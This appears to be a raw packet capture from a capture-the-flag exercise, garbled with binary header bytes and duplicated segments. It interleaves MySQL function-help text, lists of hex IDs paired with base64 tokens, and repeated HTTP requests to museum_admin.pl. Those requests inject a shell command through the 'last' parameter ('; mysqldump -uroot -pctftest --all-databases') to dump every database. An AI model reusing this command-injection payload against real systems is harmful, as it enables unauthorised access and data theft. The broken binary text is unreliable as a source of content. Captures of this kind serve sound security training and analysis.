P+ZtЀw ) ^&C:ZZBi0`EL@/܂Sŀo0E4@?&y 3 PשZ.'- ) ^(C:ZZ0`BiEL@/o0  E4>@@ 3 P+ZtЀw ) ^&C:ZZ0`BiEL@/o0  E4@@%y 3 PשZ.'- ) ^(C=bbBi0`ET@/p܂Ao0E<@?Li  3PWX9tڀ BF (um effective length is 65,532 bytes.)\n\nNote: Before 5.0.3, trailing spaces were removed when\nVARCHAR values were stored, which differs from the standard SQL\nspecification.\n\nFrom MySQL 4.1.0 to 5.0.2, a VARCHAR column with a length\nspecification greater than 255 is converted to the smallest TEXT\ntype that can hold values of the given length. For example,\nVARCHAR(500) is converted to TEXT, and\nVARCHAR(200000) is converted to MEDIUMTEXT. This is a\ncompatibility feature. However, this conversion affects trailing-space\nremoval.\n\nVARCHAR is shorthand for CHARACTER VARYING.\n\nAs of MySQL 4.1.2, the BINARY attribute is shorthand for specifying\nthe binary collation of the column character set. Sorting and comparison is\nbased on numeric character values. Before 4.1.2, BINARY attribute\ncauses the column to be treated as a binary string. Sorting and comparison\nis based on numeric byte values.\n\nStarting from MySQL 5.0.3, VARCHAR is stored with a one-byte or\ntwo-byte length prefix + data. The length prefix is two bytes if the\nVARCHAR column is declared with a length greater than 255.\n','',''),(205,'UNHEX',23,' UNHEX(str)\n\nDoes the opposite of HEX(str). That is, it interprets each pair of\nhexadecimal digits in the argument as a number and convertsC=""Bi0`E@/Sŀo0E>@?/ 3 P+ZtЀ)i ) ^&GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.13.1.3 Connection: Keep-Alive C=""Bi0`E@/Sŀo0E@?% 3 PשZ.'߃ ) ^(GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.13.1.3 Connection: Keep-Alive C=bb0`BiET@/Ԁo0SE<@@Ki  3PWX9tڀ BF (um effective length is 65,532 bytes.)\n\nNote: Before 5.0.3, trailing spaces were removed when\nVARCHAR values were stored, which differs from the standard SQL\nspecification.\n\nFrom MySQL 4.1.0 to 5.0.2, a VARCHAR column with a length\nspecification greater than 255 is converted to the smallest TEXT\ntype that can hold values of the given length. For example,\nVARCHAR(500) is converted to TEXT, and\nVARCHAR(200000) is converted to MEDIUMTEXT. This is a\ncompatibility feature. However, this conversion affects trailing-space\nremoval.\n\nVARCHAR is shorthand for CHARACTER VARYING.\n\nAs of MySQL 4.1.2, the BINARY attribute is shorthand for specifying\nthe binary collation of the column character set. Sorting and comparison is\nbased on numeric character values. Before 4.1.2, BINARY attribute\ncauses the column to be treated as a binary string. Sorting and comparison\nis based on numeric byte values.\n\nStarting from MySQL 5.0.3, VARCHAR is stored with a one-byte or\ntwo-byte length prefix + data. The length prefix is two bytes if the\nVARCHAR column is declared with a length greater than 255.\n','',''),(205,'UNHEX',23,' UNHEX(str)\n\nDoes the opposite of HEX(str). That is, it interprets each pair of\nhexadecimal digits in the argument as a number and convertsC=""0`BiE@/o0  E>@@/ 3 P+ZtЀ)i ) ^&GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.13.1.3 Connection: Keep-Alive C=""0`BiE@/o0  E@@$ 3 PשZ.'߃ ) ^(GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.13.1.3 Connection: Keep-Alive C0@bbBi0`ET@/Klo0E5B48D28DA5DB95449DF8A6931F1313D3,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
0714491B873AEF0CCD657FAD2E2D2986,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
CD69FEFB9AA2E876DEAACABA69EDBE49,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
9A02AEC2030DD16F0425BE1027EEE499,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
ED7F4163FB9D364C4CC17AF89C6BFFE7,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
3CE275CE574DE28AA13A032ED59975DC,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
32175F1887803E0F58B54D03AABEB7BB,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
5F5DC06C47489285264EB9C3440EAF3C,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
9D9539CB6E3D0C89719A097C99AEF1E2,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
931E9E149E08DE8F2B4A93C685058423,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
53E9840F6A54E0BE3BF58BB8AE0C1BE0,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
17EE5B9F0F182EBD1430DB1B1790EA5F,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
57A225E8EACF595D475F5843C8216990,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
804819B614738F72B911D00B07A13F23,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
6F8ED8367389064C48FA35DACB37E621,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
C2482271544962D345B796EAF0CD@bb0`BiET@/o0AE5B48D28DA5DB95449DF8A6931F1313D3,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
0714491B873AEF0CCD657FAD2E2D2986,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
CD69FEFB9AA2E876DEAACABA69EDBE49,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
9A02AEC2030DD16F0425BE1027EEE499,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
ED7F4163FB9D364C4CC17AF89C6BFFE7,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
3CE275CE574DE28AA13A032ED59975DC,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
32175F1887803E0F58B54D03AABEB7BB,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
5F5DC06C47489285264EB9C3440EAF3C,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
9D9539CB6E3D0C89719A097C99AEF1E2,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
931E9E149E08DE8F2B4A93C685058423,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
53E9840F6A54E0BE3BF58BB8AE0C1BE0,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
17EE5B9F0F182EBD1430DB1B1790EA5F,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
57A225E8EACF595D475F5843C8216990,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
804819B614738F72B911D00B07A13F23,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
6F8ED8367389064C48FA35DACB37E621,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
C2482271544962D345B796EAF0C@bbBi0`ET@/Klo0E8BEB5FDC1F44D44282C736E196BCF6E9,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
42202B8D45278D69C087DD9F3C6AC84F,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
4A3078CA8C62FDD22E8A1CDA77287A6F,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
A6F1D2DBB699EE7233F9EACB9ECFC161,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
362DC20029D0BDF74405C0C440407F21,ucsb,MTNzEwEDABKh6HgWkMf4f6LWSmdyn0lYH3d8gw==
0801B94AC4512E832818FD1C4E5EDD41,ucsb,MTNzEwEDABPeowHYneoVdC40viYC0ymYuC1KQw==
DEDD60AD28D6B17D62516232D020E57F,ucsb,MTNzEwEDABQpgjXdi6S1LwGlqueBO5dUU7EWAw==
4C7CE3B8CF2007883DD8E6467D99EE01,ucsb,MTNzEwEDABUX3HIi8vPAXONFA1XOTp1cuKIuuQ==
0F969B74802B108FCC0B8806E4F0A78D,ucsb,MTNzEwEDABZDgkRuhqwy9hUZucuCax7NEZBBDQ==
751244A2B32D69BD4E2773CD3AD54F81,ucsb,MTNzEwEDABdgK32x1NpdrR3RnNGApZthDaTbTA==
03883D733D5C1F2EB577DB0D97443083,ucsb,MTNzEwEDABh+YiBQA9h+BDsZmejFW2FldCXCuA==
8173854A1A194E2B382F4875EFA86838,ucsb,MTNzEwEDABmaG51pFL2U3f3SCQgmsFLkOmUx2w==
BED93147A6DF8F0772613C3FF7BBC708,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
81F1E1F4F68699F1AF496A9B473EC6C5,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
B32450FEE58569785E5743F923266587,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHC@bb0`BiET@/o0AE8BEB5FDC1F44D44282C736E196BCF6E9,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
42202B8D45278D69C087DD9F3C6AC84F,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
4A3078CA8C62FDD22E8A1CDA77287A6F,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
A6F1D2DBB699EE7233F9EACB9ECFC161,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
362DC20029D0BDF74405C0C440407F21,ucsb,MTNzEwEDABKh6HgWkMf4f6LWSmdyn0lYH3d8gw==
0801B94AC4512E832818FD1C4E5EDD41,ucsb,MTNzEwEDABPeowHYneoVdC40viYC0ymYuC1KQw==
DEDD60AD28D6B17D62516232D020E57F,ucsb,MTNzEwEDABQpgjXdi6S1LwGlqueBO5dUU7EWAw==
4C7CE3B8CF2007883DD8E6467D99EE01,ucsb,MTNzEwEDABUX3HIi8vPAXONFA1XOTp1cuKIuuQ==
0F969B74802B108FCC0B8806E4F0A78D,ucsb,MTNzEwEDABZDgkRuhqwy9hUZucuCax7NEZBBDQ==
751244A2B32D69BD4E2773CD3AD54F81,ucsb,MTNzEwEDABdgK32x1NpdrR3RnNGApZthDaTbTA==
03883D733D5C1F2EB577DB0D97443083,ucsb,MTNzEwEDABh+YiBQA9h+BDsZmejFW2FldCXCuA==
8173854A1A194E2B382F4875EFA86838,ucsb,MTNzEwEDABmaG51pFL2U3f3SCQgmsFLkOmUx2w==
BED93147A6DF8F0772613C3FF7BBC708,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
81F1E1F4F68699F1AF496A9B473EC6C5,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
B32450FEE58569785E5743F923266587,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHCAbbBi0`ET@/p܂Ao0E<@?Lh  3PW]Atڀ  ( it to the\ncharacter represented by the number. The resulting characters are returned as\na binary string.\n','mysql> SELECT UNHEX(\'4D7953514C\');\n -> \'MySQL\'\nmysql> SELECT 0x4D7953514C;\n -> \'MySQL\'\nmysql> SELECT UNHEX(HEX(\'string\'));\n -> \'string\'\nmysql> SELECT HEX(UNHEX(\'1267\'));\n -> \'1267\'',''),(206,'- UNARY',4,' -\nUnary minus. Changes the sign of the argument.\n','mysql> SELECT - 2;\n -> -2',''),(207,'COS',4,' COS(X)\nReturns the cosine of X, where X is given in radians.\n','mysql> SELECT COS(PI());\n -> -1.000000',''),(208,'DATE FUNCTION',14,' DATE(expr)\n\nExtracts the date part of the date or datetime expression expr.\n','mysql> SELECT DATE(\'2003-12-31 01:02:03\');\n -> \'2003-12-31\'',''),(209,'RESET MASTER',6,'RESET MASTER\n\nDeletes all binary logs listed in the index file,\nresets the binary log index file to be empty, and creates a new binary log\nfile.\n\nThis statement was named FLUSH MASTER before MySQL 3.23.26.\n','',''),(210,'TAN',4,' TAN(X)\nReturns the tangent of X, where X is given in radians.\n','mysql> SELECT TAN(PI()+1);\n -> 1.557408',''),(211,'PI',4,' PI()\nReturns the value of PI. The default number of decimals displayed is five, but\nMySQL internally usesCAbb0`BiET@/Ԁo0SE<@@Kh  3PW]Atڀ  ( it to the\ncharacter represented by the number. The resulting characters are returned as\na binary string.\n','mysql> SELECT UNHEX(\'4D7953514C\');\n -> \'MySQL\'\nmysql> SELECT 0x4D7953514C;\n -> \'MySQL\'\nmysql> SELECT UNHEX(HEX(\'string\'));\n -> \'string\'\nmysql> SELECT HEX(UNHEX(\'1267\'));\n -> \'1267\'',''),(206,'- UNARY',4,' -\nUnary minus. Changes the sign of the argument.\n','mysql> SELECT - 2;\n -> -2',''),(207,'COS',4,' COS(X)\nReturns the cosine of X, where X is given in radians.\n','mysql> SELECT COS(PI());\n -> -1.000000',''),(208,'DATE FUNCTION',14,' DATE(expr)\n\nExtracts the date part of the date or datetime expression expr.\n','mysql> SELECT DATE(\'2003-12-31 01:02:03\');\n -> \'2003-12-31\'',''),(209,'RESET MASTER',6,'RESET MASTER\n\nDeletes all binary logs listed in the index file,\nresets the binary log index file to be empty, and creates a new binary log\nfile.\n\nThis statement was named FLUSH MASTER before MySQL 3.23.26.\n','',''),(210,'TAN',4,' TAN(X)\nReturns the tangent of X, where X is given in radians.\n','mysql> SELECT TAN(PI()+1);\n -> 1.557408',''),(211,'PI',4,' PI()\nReturns the value of PI. The default number of decimals displayed is five, but\nMySQL internally usesCFbbBi0`ET@/p܂Ao0E<@?Lg  3PWbItڀ  ( the full double-precision value for PI.\n','mysql> SELECT PI();\n -> 3.141593\nmysql> SELECT PI()+0.000000000000000000;\n -> 3.141592653589793116',''),(212,'WEEKOFYEAR',14,' WEEKOFYEAR(date)\n\nReturns the calendar week of the date as a number in the\nrange from 1 to 53. It is a compatibility function\nthat is equivalent to WEEK(date,3).\n','mysql> SELECT WEEKOFYEAR(\'1998-02-20\');\n -> 8',''),(213,'/',4,' /\nDivision:\n','mysql> SELECT 3/5;\n -> 0.60',''),(214,'STDDEV_SAMP',12,' STDDEV_SAMP(expr)\nReturns the sample standard deviation of expr (the square root of\nVAR_SAMP(). This function was added in MySQL 5.0.3.\n','',''),(215,'MLINEFROMWKB',13,' MLineFromWKB(wkb[,srid])\n MultiLineStringFromWKB(wkb[,srid])\nConstructs a MULTILINESTRING value using its WKB representation and SRID.\n','',''),(216,'UNCOMPRESSED_LENGTH',23,' UNCOMPRESSED_LENGTH(compressed_string)\nReturns the length of a compressed string before compression.\n','mysql> SELECT UNCOMPRESSED_LENGTH(COMPRESS(REPEAT(\'a\',30)));\n -> 30',''),(217,'LOG2',4,' LOG2(X)\nReturns the base-2 logarithm of X.\n','mysql> SELECT LOG2(65536);\n -> 16.000000\nmysql> SELECT LOG2(-100);\n -> NULL',''),(218,'SUBTIME',14,' SUBTIME(expr,expr2)\n\n\nSUBTIME(CFbb0`BiET@/Ԁo0SE<@@Kg  3PWbItڀ  ( the full double-precision value for PI.\n','mysql> SELECT PI();\n -> 3.141593\nmysql> SELECT PI()+0.000000000000000000;\n -> 3.141592653589793116',''),(212,'WEEKOFYEAR',14,' WEEKOFYEAR(date)\n\nReturns the calendar week of the date as a number in the\nrange from 1 to 53. It is a compatibility function\nthat is equivalent to WEEK(date,3).\n','mysql> SELECT WEEKOFYEAR(\'1998-02-20\');\n -> 8',''),(213,'/',4,' /\nDivision:\n','mysql> SELECT 3/5;\n -> 0.60',''),(214,'STDDEV_SAMP',12,' STDDEV_SAMP(expr)\nReturns the sample standard deviation of expr (the square root of\nVAR_SAMP(). This function was added in MySQL 5.0.3.\n','',''),(215,'MLINEFROMWKB',13,' MLineFromWKB(wkb[,srid])\n MultiLineStringFromWKB(wkb[,srid])\nConstructs a MULTILINESTRING value using its WKB representation and SRID.\n','',''),(216,'UNCOMPRESSED_LENGTH',23,' UNCOMPRESSED_LENGTH(compressed_string)\nReturns the length of a compressed string before compression.\n','mysql> SELECT UNCOMPRESSED_LENGTH(COMPRESS(REPEAT(\'a\',30)));\n -> 30',''),(217,'LOG2',4,' LOG2(X)\nReturns the base-2 logarithm of X.\n','mysql> SELECT LOG2(65536);\n -> 16.000000\nmysql> SELECT LOG2(-100);\n -> NULL',''),(218,'SUBTIME',14,' SUBTIME(expr,expr2)\n\n\nSUBTIME(CnJbbBi0`ET@/p܂Ao0E<@?Lf  3PWgQtڀ < () subtracts expr2 from expr and returns the result.\nexpr is a time or datetime expression, and expr2 is a time\nexpression.\n','mysql> SELECT SUBTIME(\'1997-12-31 23:59:59.999999\',\n -> \'1 1:1:1.000002\');\n -> \'1997-12-30 22:58:58.999997\'\nmysql> SELECT SUBTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'-00:59:59.999999\'',''),(219,'DROP TABLE',28,'DROP TABLE removes one or more tables. You must have the DROP\nprivilege for each table. All table data and the table\ndefinition are /removed/, so /be careful/ with this statement!\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring for tables that don\'t exist. As of\nMySQL 4.1, a NOTE is generated for each non-existent table when\nusing IF EXISTS.\nSee also : [SHOW WARNINGS, , SHOW WARNINGS].\n\nRESTRICT and CASCADE are allowed to make porting easier.\nFor the moment, they do nothing.\n\nNote: DROP TABLE automatically commits the current\nactive transaction, unless you are using MySQL 4.1 or higher and the\nTEMPORARY keyword.\n','DROP [TEMPORARY] TABLE [IF EXISTS]\n tbl_name [, tbl_name] ...\n [RESTRICT | CASCADE]',''),(220,'DUAL',22,'SELECT ... FROM DUAL is an alias for SELECT ....\n(To be compatible with some other databaCJbb0`BiET@/Ԁo0SE<@@Kf  3PWgQtڀ < () subtracts expr2 from expr and returns the result.\nexpr is a time or datetime expression, and expr2 is a time\nexpression.\n','mysql> SELECT SUBTIME(\'1997-12-31 23:59:59.999999\',\n -> \'1 1:1:1.000002\');\n -> \'1997-12-30 22:58:58.999997\'\nmysql> SELECT SUBTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'-00:59:59.999999\'',''),(219,'DROP TABLE',28,'DROP TABLE removes one or more tables. You must have the DROP\nprivilege for each table. All table data and the table\ndefinition are /removed/, so /be careful/ with this statement!\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring for tables that don\'t exist. As of\nMySQL 4.1, a NOTE is generated for each non-existent table when\nusing IF EXISTS.\nSee also : [SHOW WARNINGS, , SHOW WARNINGS].\n\nRESTRICT and CASCADE are allowed to make porting easier.\nFor the moment, they do nothing.\n\nNote: DROP TABLE automatically commits the current\nactive transaction, unless you are using MySQL 4.1 or higher and the\nTEMPORARY keyword.\n','DROP [TEMPORARY] TABLE [IF EXISTS]\n tbl_name [, tbl_name] ...\n [RESTRICT | CASCADE]',''),(220,'DUAL',22,'SELECT ... FROM DUAL is an alias for SELECT ....\n(To be compatible with some other databaChKbbBi0`ET@/Klo0ECD51B0A0B60D2515C5242E258EA0C268,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
A0563A602CE930EE1DC4018E3B93A40A,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
FF80F8A3679C696ED0B323FEC6B0A0A6,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
3400EF5556B83A064D25FBB9E35F73A5,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
36AE9C40367C601E5D8C5C437709DEB1,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
6155FDC574EE9AB0546668C5EFA35F2A,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
B8D7321DE2761FDD4E91BE5C5CE912A5,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
0396D150F8545A592C91FA3B1649B8B8,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
5422C8527C744255EBF01CB4308DFD17,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
0E85599D17F48D0D30CD85592A582F5E,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
35E1EB917935F730606E28A03C8E9B25,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
339FE0B6DBA724C36D077B3D6FCBC1E5,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
E10D6B57110DE5858D5DFBAEEBAF7F20,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
917CBD1F14B226F83F3D9A10621A5949,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
2ABFD3602AB9113B47B3BE59E69FECC9,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
3D63CE66A689E83350BD5D10F1A17CzKbb0`BiET@/o0AECD51B0A0B60D2515C5242E258EA0C268,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
A0563A602CE930EE1DC4018E3B93A40A,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
FF80F8A3679C696ED0B323FEC6B0A0A6,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
3400EF5556B83A064D25FBB9E35F73A5,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
36AE9C40367C601E5D8C5C437709DEB1,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
6155FDC574EE9AB0546668C5EFA35F2A,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
B8D7321DE2761FDD4E91BE5C5CE912A5,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
0396D150F8545A592C91FA3B1649B8B8,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
5422C8527C744255EBF01CB4308DFD17,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
0E85599D17F48D0D30CD85592A582F5E,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
35E1EB917935F730606E28A03C8E9B25,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
339FE0B6DBA724C36D077B3D6FCBC1E5,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
E10D6B57110DE5858D5DFBAEEBAF7F20,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
917CBD1F14B226F83F3D9A10621A5949,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
2ABFD3602AB9113B47B3BE59E69FECC9,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
3D63CE66A689E83350BD5D10F1A17C~KbbBi0`ET@/Klo0E92F6F252290188207BF8E9FAD42B53C2,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
00212AC6371680C8C0E57D4CA436C77A,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
8B9D3C75F78688E740662AA94E7105B1,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
822577794DE8A51573488B5AEF0C8086,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
0BF33A9B596F3C20CC52121EA755C925,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
28A60744A4A83EE2C60E5A11B4222560,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
15F75A10EA7A95248CD2179F0E15063E,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
006712E124D012D763C0BB8B334A5E8B,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
BF78392C2C087AED81EF18C28CCB0E2E,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
0CFE9CAC025C5405689FBEE7248E3440,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
D50E036495B79D08629F8AF5782D06DB,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
B02DDF00E1BB91672990B17181961761,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
B13800F1AD5E4668A6AFB397C9A68E4A,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
4F916F8D730B6B77B2EE4CC7F5AEA617,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
2C34084884C78E3CD3766F3C769C460C,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuCKbb0`BiET@/o0AE92F6F252290188207BF8E9FAD42B53C2,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
00212AC6371680C8C0E57D4CA436C77A,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
8B9D3C75F78688E740662AA94E7105B1,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
822577794DE8A51573488B5AEF0C8086,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
0BF33A9B596F3C20CC52121EA755C925,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
28A60744A4A83EE2C60E5A11B4222560,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
15F75A10EA7A95248CD2179F0E15063E,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
006712E124D012D763C0BB8B334A5E8B,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
BF78392C2C087AED81EF18C28CCB0E2E,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
0CFE9CAC025C5405689FBEE7248E3440,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
D50E036495B79D08629F8AF5782D06DB,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
B02DDF00E1BB91672990B17181961761,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
B13800F1AD5E4668A6AFB397C9A68E4A,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
4F916F8D730B6B77B2EE4CC7F5AEA617,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
2C34084884C78E3CD3766F3C769C460C,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuCObbBi0`ET@/p܂Ao0E<@?Le  3PWlYtڀ -I (ses).\n','',''),(221,'INSTR',23,' INSTR(str,substr)\nReturns the position of the first occurrence of substring substr in\nstring str. This is the same as the two-argument form of\nLOCATE(), except that the arguments are swapped.\n','mysql> SELECT INSTR(\'foobarbar\', \'bar\');\n -> 4\nmysql> SELECT INSTR(\'xbar\', \'foobar\');\n -> 0',''),(222,'NOW',14,' NOW()\n\nReturns the current date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT NOW();\n -> \'1997-12-15 23:50:26\'\nmysql> SELECT NOW() + 0;\n -> 19971215235026',''),(223,'>=',26,' >=\nGreater than or equal:\n','mysql> SELECT 2 >= 2;\n -> 1',''),(224,'EXP',4,' EXP(X)\nReturns the value of e (the base of natural logarithms) raised to\nthe power of X.\n','mysql> SELECT EXP(2);\n -> 7.389056\nmysql> SELECT EXP(-2);\n -> 0.135335',''),(225,'SHA',17,' SHA1(str)\n SHA(str)\nCalculates an SHA1 160-bit checksum for the string, as described in\nRFC 3174 (Secure Hash Algorithm). The value is returned as a string of 40 hex\ndigits, or NULL if the argument was NULL.\nOne of the possible uses for this function is as a hash key. You can\nalso use it asCObb0`BiET@/Ԁo0SE<@@Ke  3PWlYtڀ -I (ses).\n','',''),(221,'INSTR',23,' INSTR(str,substr)\nReturns the position of the first occurrence of substring substr in\nstring str. This is the same as the two-argument form of\nLOCATE(), except that the arguments are swapped.\n','mysql> SELECT INSTR(\'foobarbar\', \'bar\');\n -> 4\nmysql> SELECT INSTR(\'xbar\', \'foobar\');\n -> 0',''),(222,'NOW',14,' NOW()\n\nReturns the current date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT NOW();\n -> \'1997-12-15 